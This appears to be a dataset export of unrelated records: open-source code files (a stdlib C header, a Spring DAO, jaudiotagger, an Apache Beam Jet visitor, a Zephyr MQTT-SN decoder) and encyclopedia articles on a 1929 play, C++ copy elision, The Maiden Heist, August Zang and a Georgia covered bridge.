text
stringlengths 1
22.8M
|
|---|
```objective-c
/**
* @license Apache-2.0
*
*
*
* path_to_url
*
* Unless required by applicable law or agreed to in writing, software
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*/
/*
* The following is auto-generated. Do not manually edit. See scripts/loops.js.
*/
#ifndef STDLIB_STRIDED_BASE_BINARY_CC_Z_AS_ZZ_Z_H
#define STDLIB_STRIDED_BASE_BINARY_CC_Z_AS_ZZ_Z_H
#include <stdint.h>
/*
* If C++, prevent name mangling so that the compiler emits a binary file having undecorated names, thus mirroring the behavior of a C compiler.
*/
#ifdef __cplusplus
extern "C" {
#endif
/**
* Applies a binary callback to strided input array elements and assigns results to elements in a strided output array.
*/
void stdlib_strided_cc_z_as_zz_z( uint8_t *arrays[], const int64_t *shape, const int64_t *strides, void *fcn );
#ifdef __cplusplus
}
#endif
#endif // !STDLIB_STRIDED_BASE_BINARY_CC_Z_AS_ZZ_Z_H
```
|
```java
package cn.crap.dao.custom;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.jdbc.core.JdbcTemplate;
import org.springframework.stereotype.Service;
import org.springframework.util.Assert;
/**
* @author nico 2017-07-28
*/
@Service
public class CustomDebugDao {
@Autowired
private JdbcTemplate jdbcTemplate;
public void deleteByModuleId(String moduleId){
Assert.notNull(moduleId);
jdbcTemplate.update("delete from debug where moduleId=?", moduleId);
}
}
```
|
Harlem: A Melodrama of Negro Life in Harlem is a 1929 play by Wallace Thurman. One of its original titles was Black Mecca and another was Black Belt. The play was loosely based on Thurman's short story "Cordelia the Crude". The play was written with Thurman's friend William Jourdan Rapp. It opened at the Apollo Theater and was successful, featuring a depiction of a migrant family coming to New York for a better life but meeting hardship in the city.
In its entry on the Harlem Renaissance, Encyclopædia Britannica describes the play as depicting vice and crime with "vernacular and slang-ridden dialogue". It drew praise from white critics and mixed reactions from African American critics, some of whom lamented its focus on the lower echelons of Harlem society. It played for 93 showings and then toured in other cities.
References
1929 plays
African-American plays
Melodramas
Plays set in Harlem
|
In C++ computer programming, copy elision refers to a compiler optimization technique that eliminates unnecessary copying of objects.
The C++ language standard generally allows implementations to perform any optimization, provided the resulting program's observable behavior is the same as if, i.e. pretending, the program were executed exactly as mandated by the standard. Beyond that, the standard also describes a few situations where copying can be eliminated even if this would alter the program's behavior, the most common being the return value optimization (see below). Another widely implemented optimization, described in the C++ standard, is when a temporary object of class type is copied to an object of the same type. As a result, copy-initialization is usually equivalent to direct-initialization in terms of performance, but not in semantics; copy-initialization still requires an accessible copy constructor. The optimization can not be applied to a temporary object that has been bound to a reference.
Example
#include <iostream>
int n = 0;
struct C {
explicit C(int) {}
C(const C&) { ++n; } // the copy constructor has a visible side effect
}; // it modifies an object with static storage duration
int main() {
C c1(42); // direct-initialization, calls C::C(int)
C c2 = C(42); // copy-initialization, calls C::C(const C&)
std::cout << n << std::endl; // prints 0 if the copy was elided, 1 otherwise
}
According to the standard a similar optimization may be applied to objects being thrown and caught, but it is unclear whether the optimization applies to both the copy from the thrown object to the exception object, and the copy from the exception object to the object declared in the exception-declaration of the catch clause. It is also unclear whether this optimization only applies to temporary objects, or named objects as well. Given the following source code:
#include <iostream>
struct C {
C() = default;
C(const C&) { std::cout << "Hello World!\n"; }
};
void f() {
C c;
throw c; // copying the named object c into the exception object.
} // It is unclear whether this copy may be elided (omitted).
int main() {
try {
f();
} catch (C c) { // copying the exception object into the temporary in the
// exception declaration.
} // It is also unclear whether this copy may be elided (omitted).
}
A conforming compiler should therefore produce a program which prints "Hello World!" twice. In the current revision of the C++ standard (C++11), the issues have been addressed, essentially allowing both the copy from the named object to the exception object, and the copy into the object declared in the exception handler to be elided.
GCC provides the -fno-elide-constructors option to disable copy-elision. This option is useful to observe (or not observe) the effects of return value optimization or other optimizations where copies are elided. It is generally not recommended to disable this important optimization.
Return value optimization
In the context of the C++ programming language, return value optimization (RVO) is a compiler optimization that involves eliminating the temporary object created to hold a function's return value. RVO is allowed to change the observable behaviour of the resulting program by the C++ standard.
Summary
In general, the C++ standard allows a compiler to perform any optimization, provided the resulting executable exhibits the same observable behaviour as if (i.e. pretending) all the requirements of the standard have been fulfilled. This is commonly referred to as the "as-if rule". The term return value optimization refers to a special clause in the C++ standard that goes even further than the "as-if" rule: an implementation may omit a copy operation resulting from a return statement, even if the copy constructor has side effects.
The following example demonstrates a scenario where the implementation may eliminate one or both of the copies being made, even if the copy constructor has a visible side effect (printing text). The first copy that may be eliminated is the one where a nameless temporary C could be copied into the function f's return value. The second copy that may be eliminated is the copy of the temporary object returned by f to obj.
#include <iostream>
struct C {
C() = default;
C(const C&) { std::cout << "A copy was made.\n"; }
};
C f() {
return C();
}
int main() {
std::cout << "Hello World!\n";
C obj = f();
}
Depending upon the compiler, and that compiler's settings, the resulting program may display any of the following outputs:
Hello World!
A copy was made.
A copy was made.
Hello World!
A copy was made.
Hello World!
Background
Returning an object of built-in type from a function usually carries little to no overhead, since the object typically fits in a CPU register. Returning a larger object of class type may require more expensive copying from one memory location to another. To avoid this, an implementation may create a hidden object in the caller's stack frame, and pass the address of this object to the function. The function's return value is then copied into the hidden object. Thus, code such as this:
struct Data {
char bytes[16];
};
Data F() {
Data result = {};
// generate result
return result;
}
int main() {
Data d = F();
}
may generate code equivalent to this:
struct Data {
char bytes[16];
};
Data* F(Data* _hiddenAddress) {
Data result = {};
// copy result into hidden object
*_hiddenAddress = result;
return _hiddenAddress;
}
int main() {
Data _hidden; // create hidden object
Data d = *F(&_hidden); // copy the result into d
}
which causes the Data object to be copied twice.
In the early stages of the evolution of C++, the language's inability to efficiently return an object of class type from a function was considered a weakness. Around 1991, Walter Bright implemented a technique to minimize copying, effectively replacing the hidden object and the named object inside the function with the object used for holding the result:
struct Data {
char bytes[16];
};
void F(Data* p) {
// generate result directly in *p
}
int main() {
Data d;
F(&d);
}
Bright implemented this optimization in his Zortech C++ compiler. This particular technique was later coined "Named return value optimization" (NRVO), referring to the fact that the copying of a named object is elided.
Compiler support
Return value optimization is supported on most compilers.
There may be, however, circumstances where the compiler is unable to perform the optimization. One common case is when a function may return different named objects depending on the path of execution:
#include <string>
std::string F(bool cond = false) {
std::string first("first");
std::string second("second");
// the function may return one of two named objects
// depending on its argument. RVO might not be applied
return cond ? first : second;
}
int main() {
std::string result = F();
}
External links
Copy elision on cppreference.com
References
Articles with example C++ code
Compiler optimizations
C++
|
```java
/**
* @author : Paul Taylor
* @author : Eric Farng
*
* Version @version:$Id$
*
*
* This library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser
* or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
* the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*
* you can get a copy from path_to_url or write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
* Description:
*
*/
package org.jaudiotagger.tag.datatype;
import org.jaudiotagger.logging.ErrorMessage;
import org.jaudiotagger.tag.InvalidDataTypeException;
import org.jaudiotagger.tag.id3.AbstractTagFrameBody;
import org.jaudiotagger.tag.id3.valuepair.*;
import org.jaudiotagger.tag.reference.GenreTypes;
import org.jaudiotagger.tag.reference.PictureTypes;
import org.jaudiotagger.utils.EqualsUtil;
import java.util.Iterator;
import java.util.Map;
import java.util.TreeSet;
/**
* Represents a number thats acts as a key into an enumeration of values
*/
public class NumberHashMap extends NumberFixedLength implements HashMapInterface<Integer, String>
{
/**
* key to value map
*/
private Map<Integer, String> keyToValue = null;
/**
* value to key map
*/
private Map<String, Integer> valueToKey = null;
/**
*
*/
private boolean hasEmptyValue = false;
/**
* Creates a new ObjectNumberHashMap datatype.
*
* @param identifier
* @param frameBody
* @param size
* @throws IllegalArgumentException
*/
public NumberHashMap(String identifier, AbstractTagFrameBody frameBody, int size)
{
super(identifier, frameBody, size);
if (identifier.equals(DataTypes.OBJ_GENRE))
{
valueToKey = GenreTypes.getInstanceOf().getValueToIdMap();
keyToValue = GenreTypes.getInstanceOf().getIdToValueMap();
//genres can be an id or literal value
hasEmptyValue = true;
}
else if (identifier.equals(DataTypes.OBJ_TEXT_ENCODING))
{
valueToKey = TextEncoding.getInstanceOf().getValueToIdMap();
keyToValue = TextEncoding.getInstanceOf().getIdToValueMap();
}
else if (identifier.equals(DataTypes.OBJ_INTERPOLATION_METHOD))
{
valueToKey = InterpolationTypes.getInstanceOf().getValueToIdMap();
keyToValue = InterpolationTypes.getInstanceOf().getIdToValueMap();
}
else if (identifier.equals(DataTypes.OBJ_PICTURE_TYPE))
{
valueToKey = PictureTypes.getInstanceOf().getValueToIdMap();
keyToValue = PictureTypes.getInstanceOf().getIdToValueMap();
//Issue #224 Values should map, but have examples where they dont, this is a workaround
hasEmptyValue = true;
}
else if (identifier.equals(DataTypes.OBJ_TYPE_OF_EVENT))
{
valueToKey = EventTimingTypes.getInstanceOf().getValueToIdMap();
keyToValue = EventTimingTypes.getInstanceOf().getIdToValueMap();
}
else if (identifier.equals(DataTypes.OBJ_TIME_STAMP_FORMAT))
{
valueToKey = EventTimingTimestampTypes.getInstanceOf().getValueToIdMap();
keyToValue = EventTimingTimestampTypes.getInstanceOf().getIdToValueMap();
}
else if (identifier.equals(DataTypes.OBJ_TYPE_OF_CHANNEL))
{
valueToKey = ChannelTypes.getInstanceOf().getValueToIdMap();
keyToValue = ChannelTypes.getInstanceOf().getIdToValueMap();
}
else if (identifier.equals(DataTypes.OBJ_RECIEVED_AS))
{
valueToKey = ReceivedAsTypes.getInstanceOf().getValueToIdMap();
keyToValue = ReceivedAsTypes.getInstanceOf().getIdToValueMap();
}
else if (identifier.equals(DataTypes.OBJ_CONTENT_TYPE))
{
valueToKey = SynchronisedLyricsContentType.getInstanceOf().getValueToIdMap();
keyToValue = SynchronisedLyricsContentType.getInstanceOf().getIdToValueMap();
}
else
{
throw new IllegalArgumentException("Hashmap identifier not defined in this class: " + identifier);
}
}
public NumberHashMap(NumberHashMap copyObject)
{
super(copyObject);
this.hasEmptyValue = copyObject.hasEmptyValue;
// we don'timer need to clone/copy the maps here because they are static
this.keyToValue = copyObject.keyToValue;
this.valueToKey = copyObject.valueToKey;
}
/**
* @return the key to value map
*/
public Map<Integer, String> getKeyToValue()
{
return keyToValue;
}
/**
* @return the value to key map
*/
public Map<String, Integer> getValueToKey()
{
return valueToKey;
}
/**
* @param value
*/
public void setValue(Object value)
{
if (value instanceof Byte)
{
this.value = (long) ((Byte) value).byteValue();
}
else if (value instanceof Short)
{
this.value = (long) ((Short) value).shortValue();
}
else if (value instanceof Integer)
{
this.value = (long) ((Integer) value).intValue();
}
else
{
this.value = value;
}
}
/**
* @param obj
* @return
*/
public boolean equals(Object obj)
{
if(obj==this)
{
return true;
}
if (!(obj instanceof NumberHashMap))
{
return false;
}
NumberHashMap that = (NumberHashMap) obj;
return
EqualsUtil.areEqual(hasEmptyValue, that.hasEmptyValue) &&
EqualsUtil.areEqual(keyToValue, that.keyToValue) &&
EqualsUtil.areEqual(valueToKey, that.valueToKey) &&
super.equals(that);
}
/**
* @return
*/
public Iterator<String> iterator()
{
if (keyToValue == null)
{
return null;
}
else
{
// put them in a treeset first to sort them
TreeSet<String> treeSet = new TreeSet<String>(keyToValue.values());
if (hasEmptyValue)
{
treeSet.add("");
}
return treeSet.iterator();
}
}
/**
* Read the key from the buffer.
*
* @param arr
* @param offset
* @throws InvalidDataTypeException if emptyValues are not allowed and the eky was invalid.
*/
public void readByteArray(byte[] arr, int offset) throws InvalidDataTypeException
{
super.readByteArray(arr, offset);
//Mismatch:Superclass uses Long, but maps expect Integer
Integer intValue = ((Long) value).intValue();
if (!keyToValue.containsKey(intValue))
{
if (!hasEmptyValue)
{
throw new InvalidDataTypeException(ErrorMessage.MP3_REFERENCE_KEY_INVALID.getMsg(identifier, intValue));
}
else if (identifier.equals(DataTypes.OBJ_PICTURE_TYPE))
{
logger.warning(ErrorMessage.MP3_PICTURE_TYPE_INVALID.getMsg(value));
}
}
}
/**
* @return
*/
public String toString()
{
if (value == null)
{
return "";
}
else if (keyToValue.get(value) == null)
{
return "";
}
else
{
return keyToValue.get(value);
}
}
}
```
|
The Maiden Heist is a 2009 American crime comedy film directed by Peter Hewitt and starring Morgan Freeman, Christopher Walken, William H. Macy and Marcia Gay Harden. The film was released as The Heist in the United Kingdom.
Plot
Roger (Christopher Walken) is a security guard at an art museum, where he spends a lot of time staring at his favorite painting, The Lonely Maiden, a beautiful woman staring forlornly out into the distance. Despite the fact he has a wife, Rose (Marcia Gay Harden), he has become rather obsessed with the painting. Rose wants Roger to retire so they can move to Florida. One afternoon, Roger learns that several pieces including The Lonely Maiden are to be permanently moved to another museum in Copenhagen, Denmark. Unable to follow the maiden, Roger falls into despair until he meets Charles (Morgan Freeman), another guard who has a similar attraction to a painting on another floor, a painting of a woman with cats.
George (William H. Macy) is also obsessed with a piece of art, a nude sculpture of a Greek warrior; he often strips down and poses naked beside it during his night shift. Using the advantages between their shifts and experience, George comes up with the idea to steal their favorite works of art and replace them with replicas. Roger volunteers to tag the artworks being shipped, while Charles and George seek assistance in replicating their favorites. Because Charles is a painter, he's able to do the cat painting perfectly, but he fails in capturing The Lonely Maiden. The men hire a street artist (Breckin Meyer) for that task, forcing Roger to steal Rose's Florida vacation savings to pay for the job. Rose becomes suspicious and nearly ends up having Roger taken off the volunteer staff. George manages to replicate "his" sculpture and the Maiden copy is also completed.
On the day of the switch, George sneaks into the warehouse in the crate with the statue. He successfully swaps the three marked pieces, but can't resist stripping down and posing with the statue. A guard shows up, forcing George to hide in the crate without his clothes. The next morning, when Roger and Charlie (with the unwitting accompaniment of Rose) come to collect him, the crate containing George ends up in the wrong van. A panic-stricken Charlie gives chase, and they manage to successfully rescue George, who emerges from the shipping crate unclothed, much to Rose's shock.
Having pulled off the heist without getting caught, they retire from their jobs and Rose is none the wiser. On a trip to Florida, Roger is enthralled by Rose as she looks out over the ocean because she strikingly resembles the Lonely Maiden pose. Their love life is rekindled. Meanwhile, the three men hide their treasures in a shack on Charles' apartment roof so that they can go and view them at their leisure. However, when Roger looks at the painting, it doesn't inspire him like it once did. He smiles and remembers his wife. Meanwhile, in Copenhagen, a guard on duty passes The Lonely Maiden copy and looks at it, smiling.
Cast
Morgan Freeman as Charles Peterson
Christopher Walken as Roger Barlow
William H. Macy as George McLendon
Marcia Gay Harden as Rose
Breckin Meyer as the starving painter
Wynn Everett as Docent
Christy Scott Cashman as Assistant Museum Director
Anthony Cascio as museum guard
Victoria Cyr as woman walking poodle
Douglass Bowen Flynn as Danish guard
Elisangela DiAlencar as museum goer
Ahmad Harhash as Wassim Khail
Production
It was produced under the working title The Lonely Maiden. It was shot primarily in Boston, Massachusetts, and several scenes were filmed at the Worcester Art Museum, in Worcester, Massachusetts. The painting The Lonely Maiden was created specifically for the film by artist Jeremy Lipking.
Release
The film had a tentative release date of May 29, 2009 before being shelved following the bankruptcy of its distributor, Yari Film Group. It debuted at the Edinburgh International Film Festival June 25, 2009 and was released to DVD on November 24, 2009.
References
External links
2009 direct-to-video films
2009 films
2000s crime comedy films
2000s heist films
American crime comedy films
American heist films
Films set in Boston
Films shot in Massachusetts
Films directed by Peter Hewitt
Films scored by Rupert Gregson-Williams
2009 comedy films
2000s English-language films
2000s American films
|
August Zang (; 2 August 1807 – 4 March 1888) was an Austrian entrepreneur who founded the Viennese daily Die Presse. He also had a major influence on French baking methods.
Soldier and baker
The son of Christophe Boniface Zang, a Vienna surgeon, August Zang became an artillery officer before he went to Paris, probably in 1837, to found a bakery, Boulangerie Viennoise, which opened in 1838 or 1839. The bakery was quickly imitated, and its Austrian kipfel became the French croissant. Baking historians, who often qualify Zang as "Baron", "Count" or "Royal Chamberlain" though he did not hold those titles, sometimes claim he introduced the baguette, but that is not supported by any period source. However, he introduced the Viennese steam oven, which became standard in France.
Journalist and publisher
In 1848, when censorship was lifted in Austria, he returned to Vienna and founded Die Presse, a daily newspaper that still exists today though after several interruptions. The paper was modelled on Émile de Girardin's La Presse and introduced many of the same popularising journalistic techniques, including a low price supported by volume and advertising; serials; and short, easily-understood paragraphs. In 1864, a dispute led two key journalists to leave Die Presse to found Die Neue Freie Presse. The original Die Presse was soon known as Die Alte Presse, and Zang sold it in 1867.
Later life
In his remaining years, he owned a bank and a mine in Styria, the site of which is still known as Zangtal ("Zang Valley").
When he died, he was most known as a wealthy press magnate. His obituary in Die Presse said only that he had spent some years in Paris and omitted all mention of his role in baking.
His ornate tomb in Vienna is still a tourist attraction.
See also
Vienna bread
Viennoiserie, a French term referring to baked goods in the style of or influenced by Viennese baking
Notes
References
Wurzbach, C. (1891). Biographisches Lexikon des Kaiserthums Oesterreich, enthaltend die Lebensskizzen der denkwürdigen Perosnen, welche seit 1750 in den österreichischen Kronländern geboren wurden oder darin gelebt und gewirkt haben, (162-165)
Article in "Die Presse" on its founding
Another article in "Die Presse" on its founding
Central Cemetery Zentralfriedhof-image of Zang's tomb
Voitsberg page mentioning Zang's castle and Zangtal
August Zang and the French Croissant
19th-century Austrian businesspeople
Bakers
Austrian publishers (people)
Businesspeople from Vienna
1807 births
1888 deaths
19th-century newspaper publishers (people)
Austrian Empire military personnel
|
Elder's Mill Covered Bridge and Elder Mill is a covered bridge near Watkinsville, Georgia, and was listed on the National Register of Historic Places in 1994.
It is located on Elder Mill Rd., 4/5 mi. south of its junction with GA 15. The listing includes the covered bridge built in 1897 and a c.1900 three-story wood-frame mill building. The bridge was built in 1897 by Nathaniel Richardson to bring the Watkinsville-Athens Road across Call Creek in Clarke County, and was moved in 1924 to its current location spanning Rose Creek in Oconee County. The bridge is a long Town lattice truss covered bridge.
See also
List of covered bridges in Georgia
References
Covered bridges in Georgia (U.S. state)
National Register of Historic Places in Oconee County, Georgia
Infrastructure completed in 1897
|
```java
/*
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
*
* path_to_url
*
* Unless required by applicable law or agreed to in writing, software
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*/
package org.apache.beam.runners.jet;
import com.hazelcast.jet.core.DAG;
import java.util.function.Function;
import org.apache.beam.sdk.Pipeline;
import org.apache.beam.sdk.runners.AppliedPTransform;
import org.apache.beam.sdk.runners.TransformHierarchy;
import org.apache.beam.sdk.transforms.PTransform;
import org.apache.beam.sdk.util.construction.PTransformTranslation;
import org.apache.beam.sdk.values.PValue;
/** Logic that specifies how to apply translations when traversing the nodes of a Beam pipeline. */
@SuppressWarnings({
"nullness" // TODO(path_to_url
})
class JetGraphVisitor extends Pipeline.PipelineVisitor.Defaults {
private final JetTranslationContext translationContext;
private final Function<PTransform<?, ?>, JetTransformTranslator<?>> translatorProvider;
private boolean finalized = false;
JetGraphVisitor(
JetPipelineOptions options,
Function<PTransform<?, ?>, JetTransformTranslator<?>> translatorProvider) {
this.translationContext = new JetTranslationContext(options);
this.translatorProvider = translatorProvider;
}
@Override
public CompositeBehavior enterCompositeTransform(TransformHierarchy.Node node) {
if (finalized) {
throw new IllegalStateException("Attempting to traverse an already finalized pipeline!");
}
PTransform<?, ?> transform = node.getTransform();
if (transform != null) {
JetTransformTranslator<?> translator = translatorProvider.apply(transform);
if (translator != null) {
translate(node, translator);
return CompositeBehavior.DO_NOT_ENTER_TRANSFORM;
}
}
return CompositeBehavior.ENTER_TRANSFORM;
}
@Override
public void leaveCompositeTransform(TransformHierarchy.Node node) {
if (finalized) {
throw new IllegalStateException("Attempting to traverse an already finalized pipeline!");
}
if (node.isRootNode()) {
finalized = true;
}
}
@Override
public void visitPrimitiveTransform(TransformHierarchy.Node node) {
PTransform<?, ?> transform = node.getTransform();
JetTransformTranslator<?> translator = translatorProvider.apply(transform);
if (translator == null) {
String transformUrn = PTransformTranslation.urnForTransform(transform);
throw new UnsupportedOperationException(
"The transform " + transformUrn + " is currently not supported.");
}
translate(node, translator);
}
@Override
public void visitValue(PValue value, TransformHierarchy.Node producer) {
// do nothing here
}
DAG getDAG() {
return translationContext.getDagBuilder().getDag();
}
private <T extends PTransform<?, ?>> void translate(
TransformHierarchy.Node node, JetTransformTranslator<?> translator) {
@SuppressWarnings("unchecked")
JetTransformTranslator<T> typedTranslator = (JetTransformTranslator<T>) translator;
Pipeline pipeline = getPipeline();
AppliedPTransform<?, ?, ?> appliedTransform = node.toAppliedPTransform(pipeline);
typedTranslator.translate(pipeline, appliedTransform, node, translationContext);
}
}
```
|
```c
/*
*
*/
/** @file mqtt_sn_decoder.c
*
* @brief MQTT-SN message decoder.
*/
#include "mqtt_sn_msg.h"
#include <zephyr/net/mqtt_sn.h>
#include <zephyr/logging/log.h>
LOG_MODULE_DECLARE(net_mqtt_sn, CONFIG_MQTT_SN_LOG_LEVEL);
/**
* @brief Decode the length of a message payload.
*
* From the specification:
*
* The Length field is either 1- or 3-octet long and specifies the total number of octets
* contained in the message (including the Length field itself).
* If the first octet of the Length field is coded 0x01 then the Length field is 3-octet long;
* in this case, the two following octets specify the total number of octets of the message
* (most-significant octet first). Otherwise, the Length field is only 1-octet long and specifies
* itself the total number of octets contained in the message. The 3-octet format allows the
* encoding of message lengths up to 65535 octets. Messages with lengths smaller than 256 octets
* may use the shorter 1-octet format.
*
* @param buf
* @return Size of the message not including the length field or negative error code
*/
static ssize_t decode_payload_length(struct net_buf_simple *buf)
{
size_t length;
size_t length_field_s = 1;
size_t buflen = buf->len;
/*
* Size must not be larger than an uint16_t can fit,
* minus 3 bytes for the length field itself
*/
if (buflen > UINT16_MAX) {
LOG_ERR("Message too large");
return -EFBIG;
}
length = net_buf_simple_pull_u8(buf);
if (length == MQTT_SN_LENGTH_FIELD_EXTENDED_PREFIX) {
length = net_buf_simple_pull_be16(buf);
length_field_s = 3;
}
if (length != buflen) {
LOG_ERR("Message length %zu != buffer size %zu", length, buflen);
return -EPROTO;
}
if (length <= length_field_s) {
LOG_ERR("Message length %zu - contains no data?", length);
return -ENODATA;
}
/* subtract the size of the length field to get message length */
return length - length_field_s;
}
static void decode_flags(struct net_buf_simple *buf, struct mqtt_sn_flags *flags)
{
uint8_t b = net_buf_simple_pull_u8(buf);
flags->dup = (bool)(b & MQTT_SN_FLAGS_DUP);
flags->retain = (bool)(b & MQTT_SN_FLAGS_RETAIN);
flags->will = (bool)(b & MQTT_SN_FLAGS_WILL);
flags->clean_session = (bool)(b & MQTT_SN_FLAGS_CLEANSESSION);
flags->qos = (enum mqtt_sn_qos)((b & MQTT_SN_FLAGS_MASK_QOS) >> MQTT_SN_FLAGS_SHIFT_QOS);
flags->topic_type = (enum mqtt_sn_topic_type)((b & MQTT_SN_FLAGS_MASK_TOPICID_TYPE) >>
MQTT_SN_FLAGS_SHIFT_TOPICID_TYPE);
}
static void decode_data(struct net_buf_simple *buf, struct mqtt_sn_data *dest)
{
dest->size = buf->len;
dest->data = net_buf_simple_pull_mem(buf, buf->len);
}
static int decode_empty_message(struct net_buf_simple *buf)
{
if (buf->len) {
LOG_ERR("Message not empty");
return -EPROTO;
}
return 0;
}
static int decode_msg_advertise(struct net_buf_simple *buf, struct mqtt_sn_param_advertise *params)
{
if (buf->len != 3) {
return -EPROTO;
}
params->gw_id = net_buf_simple_pull_u8(buf);
params->duration = net_buf_simple_pull_be16(buf);
return 0;
}
static int decode_msg_gwinfo(struct net_buf_simple *buf, struct mqtt_sn_param_gwinfo *params)
{
if (buf->len < 1) {
return -EPROTO;
}
params->gw_id = net_buf_simple_pull_u8(buf);
if (buf->len) {
decode_data(buf, ¶ms->gw_add);
}
return 0;
}
static int decode_msg_connack(struct net_buf_simple *buf, struct mqtt_sn_param_connack *params)
{
if (buf->len != 1) {
return -EPROTO;
}
params->ret_code = net_buf_simple_pull_u8(buf);
return 0;
}
static int decode_msg_willtopicreq(struct net_buf_simple *buf)
{
return decode_empty_message(buf);
}
static int decode_msg_willmsgreq(struct net_buf_simple *buf)
{
return decode_empty_message(buf);
}
static int decode_msg_register(struct net_buf_simple *buf, struct mqtt_sn_param_register *params)
{
if (buf->len < 5) {
return -EPROTO;
}
params->topic_id = net_buf_simple_pull_be16(buf);
params->msg_id = net_buf_simple_pull_be16(buf);
decode_data(buf, ¶ms->topic);
return 0;
}
static int decode_msg_regack(struct net_buf_simple *buf, struct mqtt_sn_param_regack *params)
{
if (buf->len != 5) {
return -EPROTO;
}
params->topic_id = net_buf_simple_pull_be16(buf);
params->msg_id = net_buf_simple_pull_be16(buf);
params->ret_code = net_buf_simple_pull_u8(buf);
return 0;
}
static int decode_msg_publish(struct net_buf_simple *buf, struct mqtt_sn_param_publish *params)
{
struct mqtt_sn_flags flags;
if (buf->len < 6) {
return -EPROTO;
}
decode_flags(buf, &flags);
params->dup = flags.dup;
params->qos = flags.qos;
params->retain = flags.retain;
params->topic_type = flags.topic_type;
params->topic_id = net_buf_simple_pull_be16(buf);
params->msg_id = net_buf_simple_pull_be16(buf);
decode_data(buf, ¶ms->data);
return 0;
}
static int decode_msg_puback(struct net_buf_simple *buf, struct mqtt_sn_param_puback *params)
{
if (buf->len != 5) {
return -EPROTO;
}
params->topic_id = net_buf_simple_pull_be16(buf);
params->msg_id = net_buf_simple_pull_be16(buf);
params->ret_code = net_buf_simple_pull_u8(buf);
return 0;
}
static int decode_msg_pubrec(struct net_buf_simple *buf, struct mqtt_sn_param_pubrec *params)
{
if (buf->len != 2) {
return -EPROTO;
}
params->msg_id = net_buf_simple_pull_be16(buf);
return 0;
}
static int decode_msg_pubrel(struct net_buf_simple *buf, struct mqtt_sn_param_pubrel *params)
{
if (buf->len != 2) {
return -EPROTO;
}
params->msg_id = net_buf_simple_pull_be16(buf);
return 0;
}
static int decode_msg_pubcomp(struct net_buf_simple *buf, struct mqtt_sn_param_pubcomp *params)
{
if (buf->len != 2) {
return -EPROTO;
}
params->msg_id = net_buf_simple_pull_be16(buf);
return 0;
}
static int decode_msg_suback(struct net_buf_simple *buf, struct mqtt_sn_param_suback *params)
{
struct mqtt_sn_flags flags;
if (buf->len != 6) {
return -EPROTO;
}
decode_flags(buf, &flags);
params->qos = flags.qos;
params->topic_id = net_buf_simple_pull_be16(buf);
params->msg_id = net_buf_simple_pull_be16(buf);
params->ret_code = net_buf_simple_pull_u8(buf);
return 0;
}
static int decode_msg_unsuback(struct net_buf_simple *buf, struct mqtt_sn_param_unsuback *params)
{
if (buf->len != 2) {
return -EPROTO;
}
params->msg_id = net_buf_simple_pull_be16(buf);
return 0;
}
static int decode_msg_pingreq(struct net_buf_simple *buf)
{
/* The client_id field is only set if the message was sent by a client. */
return decode_empty_message(buf);
}
static int decode_msg_pingresp(struct net_buf_simple *buf)
{
return decode_empty_message(buf);
}
static int decode_msg_disconnect(struct net_buf_simple *buf,
struct mqtt_sn_param_disconnect *params)
{
/* The duration field is only set if the message was sent by a client. */
return decode_empty_message(buf);
}
static int decode_msg_willtopicresp(struct net_buf_simple *buf,
struct mqtt_sn_param_willtopicresp *params)
{
if (buf->len != 1) {
return -EPROTO;
}
params->ret_code = net_buf_simple_pull_u8(buf);
return 0;
}
static int decode_msg_willmsgresp(struct net_buf_simple *buf,
struct mqtt_sn_param_willmsgresp *params)
{
if (buf->len != 1) {
return -EPROTO;
}
params->ret_code = net_buf_simple_pull_u8(buf);
return 0;
}
int mqtt_sn_decode_msg(struct net_buf_simple *buf, struct mqtt_sn_param *params)
{
ssize_t len;
if (!buf || !buf->len) {
return -EINVAL;
}
len = decode_payload_length(buf);
if (len < 0) {
LOG_ERR("Could not decode message: %d", (int)len);
return (int)len;
}
params->type = (enum mqtt_sn_msg_type)net_buf_simple_pull_u8(buf);
LOG_INF("Decoding message type: %d", params->type);
switch (params->type) {
case MQTT_SN_MSG_TYPE_ADVERTISE:
return decode_msg_advertise(buf, ¶ms->params.advertise);
case MQTT_SN_MSG_TYPE_GWINFO:
return decode_msg_gwinfo(buf, ¶ms->params.gwinfo);
case MQTT_SN_MSG_TYPE_CONNACK:
return decode_msg_connack(buf, ¶ms->params.connack);
case MQTT_SN_MSG_TYPE_WILLTOPICREQ:
return decode_msg_willtopicreq(buf);
case MQTT_SN_MSG_TYPE_WILLMSGREQ:
return decode_msg_willmsgreq(buf);
case MQTT_SN_MSG_TYPE_REGISTER:
return decode_msg_register(buf, ¶ms->params.reg);
case MQTT_SN_MSG_TYPE_REGACK:
return decode_msg_regack(buf, ¶ms->params.regack);
case MQTT_SN_MSG_TYPE_PUBLISH:
return decode_msg_publish(buf, ¶ms->params.publish);
case MQTT_SN_MSG_TYPE_PUBACK:
return decode_msg_puback(buf, ¶ms->params.puback);
case MQTT_SN_MSG_TYPE_PUBREC:
return decode_msg_pubrec(buf, ¶ms->params.pubrec);
case MQTT_SN_MSG_TYPE_PUBREL:
return decode_msg_pubrel(buf, ¶ms->params.pubrel);
case MQTT_SN_MSG_TYPE_PUBCOMP:
return decode_msg_pubcomp(buf, ¶ms->params.pubcomp);
case MQTT_SN_MSG_TYPE_SUBACK:
return decode_msg_suback(buf, ¶ms->params.suback);
case MQTT_SN_MSG_TYPE_UNSUBACK:
return decode_msg_unsuback(buf, ¶ms->params.unsuback);
case MQTT_SN_MSG_TYPE_PINGREQ:
return decode_msg_pingreq(buf);
case MQTT_SN_MSG_TYPE_PINGRESP:
return decode_msg_pingresp(buf);
case MQTT_SN_MSG_TYPE_DISCONNECT:
return decode_msg_disconnect(buf, ¶ms->params.disconnect);
case MQTT_SN_MSG_TYPE_WILLTOPICRESP:
return decode_msg_willtopicresp(buf, ¶ms->params.willtopicresp);
case MQTT_SN_MSG_TYPE_WILLMSGRESP:
return decode_msg_willmsgresp(buf, ¶ms->params.willmsgresp);
default:
LOG_ERR("Got unexpected message type %d", params->type);
return -EINVAL;
}
}
```
|
```javascript
